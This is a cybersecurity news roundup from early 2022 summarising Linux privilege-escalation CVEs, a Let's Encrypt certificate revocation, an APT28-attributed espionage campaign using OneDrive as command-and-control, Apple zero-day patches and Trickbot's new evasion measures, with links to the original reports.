New vulnerabilities in Linux
Two new vulnerabilities of risk have recently been disclosed and are reportedly affecting Linux systems. If exploited, they could allow privilege escalation on the vulnerable system.
- CVE-2021-4034 (PwnKit): Researchers at Qualys have discovered a memory corruption flaw, which resides in polkit’s pkexec program and could allow a local attacker to escalate privileges on a vulnerable system and reach root privileges. Hours after the disclosure of the Qualys article, the first proof-of- concept (PoC) was made public, which would allow this flaw to be exploited. Qualys recommends applying the available patches that the authors of Polkit have published in Gitlab.
- CVE-2022-0185: Buffer overflow vulnerability, which resides in the Linux kernel and could allow an attacker to escape from the Kubernetes containers and take control of the node, with the CAP_SYS_ADMIN privilege enabled as a requirement. The researchers highlight that exploitation of this flaw is straightforward, so they recommend updating as soon as possible. Crusaders of Rust (CoR), the team that discovered the flaw, has revealed that they will publish the exploit code in the coming weeks on their Github repository.
More info: https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034
Let’s Encrypt SSL/TLS certificates revoked due to implementation error
Let’s Encrypt has announced in a statement that it will revoke certain SSL/TLS certificates on January 28th due to two irregularities in the implementation of the validation method. According to the statement, this will only affect certificates that were issued and validated using the TLS-ALPN-01 challenge before February 26th at 00:48 UTC, when the implementation error was corrected. They also indicate that this will only affect less than 1% of the certificates. Let’s Encrypt will communicate to affected users the guidelines they will have to follow to renew their certificates. It should be noted that this is not the first time Let’s Encrypt has faced a problem of this kind, as in October 2021 the DST Root CA X3 root certificates expired.
All the details: https://community.letsencrypt.org/t/2022-01-25-issue-with-tls-alpn-01-validation-method/170450
Espionage campaign using OneDrive as C2
Researchers at Trellix have published details of a multi-phased espionage campaign targeting high-ranking government officials and defence employees in West Asia. The campaign began in October, but the preparation of the infrastructure could date back as far as June. The input vector would be an Excel document, possibly sent by email, which exploits a remote code execution vulnerability in MSHTML (CVE-2021-40444), fixed by Microsoft in its September update bulletin. This exploit allows the deployment of a malware known as Graphite, which uses the Microsoft Graph API in order to use OneDrive as a Command & Control server. Once the connection to the C2 is established, Empire, an open-source post-exploitation framework widely used for illicit purposes, is downloaded. Due to the multiple stages of the infection chain, which facilitate evasion, as well as the use of new techniques including OneDrive as C2 to ensure that all connections are made to legitimate Microsoft domains, we could say that we are dealing with a highly sophisticated campaign. Based on the targets, researchers point to a possible attribution to APT28 (aka Sofacy, Strontium, Fancy Bear or Sednit) of Russian origin.
All info: https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/prime-ministers-office-compromised.html
Apple fixes new 0-day exploit used to breach iOS devices
Apple has released new security updates for iOS 15.3 y iPadOS 15.3, as well as macOS Monterey 12.2, in which it has fixed two 0-day vulnerabilities.
- The first of the flaws, identified as CVE-2022-22587, is a memory corruption flaw in the IOMobileFrameBuffer that affects iOS, iPadOS and macOS Monterey. Successful exploitation of this vulnerability could allow arbitrary code execution with kernel privileges on compromised devices. Apple highlights that the flaw is being actively exploited.
- The second 0-day, a flaw in Safari WebKit on iOS and iPadOS, would allow websites to track browsing activity and user identity in real time. This vulnerability, classified as CVE-2022-22594, was first discovered by Martin Bajanik of FingerprintJS on November 28th, but was only published on January 14th and fixed in this update.
Discover more: https://support.apple.com/en-us/HT213053
Trickbot strengthens protections to evade detection and analysis
IBM Trusteer researchers have analysed recent Trickbot malware campaigns, in which the operators behind the trojan have added additional layers of protection to their injections to avoid detection and analysis. These code injections are used in real time when a user with an infected device tries to access their bank account, the injections are designed to intercept and modify information leaving the browser before it reaches the bank’s server. Most of the samples in which these new capabilities have been detected have been applied in cases of bank fraud, one of Trickbot’s main activities. The implemented updates include a new server-side injection mechanism, encrypted communications with the C2 (Command&Control), an anti-debugging feature and new ways to obfuscate and hide the injected code. On the other hand, security researchers have reported that the operators of Emotet, malware that previously infects the device to distribute malware as trickbot in a second phase, have also improved their evasion techniques by using hexadecimal and octal IP addresses, reportedly using the same Webshells provider as TR with Qakbot or Squirrelwaffle. They have identified up to 138 sites compromised by this malware.
All the details: https://securityintelligence.com/posts/trickbot-bolsters-layered-defenses-prevent-injection/